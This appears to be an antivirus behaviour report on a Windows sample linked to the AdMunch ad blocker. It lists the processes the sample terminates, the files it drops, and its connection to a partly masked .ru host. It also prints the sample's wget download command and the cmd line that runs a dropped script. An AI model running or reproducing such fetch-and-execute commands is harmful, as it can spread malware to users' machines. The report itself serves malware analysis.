Technical Information
Malicious functions:
Executes the following:
- '<SYSTEM32>\taskkill.exe' /F /IM AdMunch.exe
- '<SYSTEM32>\taskkill.exe' /F /IM AdMunch64.exe
- '<SYSTEM32>\taskkill.exe' /F /IM AM32-33707.dll
- '<SYSTEM32>\taskkill.exe' /F /IM AM64-33707.dll
- '<SYSTEM32>\taskkill.exe' /F /IM AdMunch.dll
Modifies file system:
Creates the following files:
- %TEMP%\1.tmp\amupdate.cmd
- <Current directory>\wget.exe
- <Current directory>\AM.adl
Network activity:
Connects to:
- 'pr##az.ru':80
TCP:
HTTP GET requests:
- http://pr##az.ru/wp-content/files/AM.adl
UDP:
- DNS ASK pr##az.ru
Miscellaneous:
Searches for the following windows:
- ClassName: '' WindowName: ''
Creates and executes the following:
- '<Current directory>\wget.exe' -cN -t10 -T15 "http://pr##az.ru/wp-content/files/AM.adl"
Executes the following:
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\amupdate.cmd" "
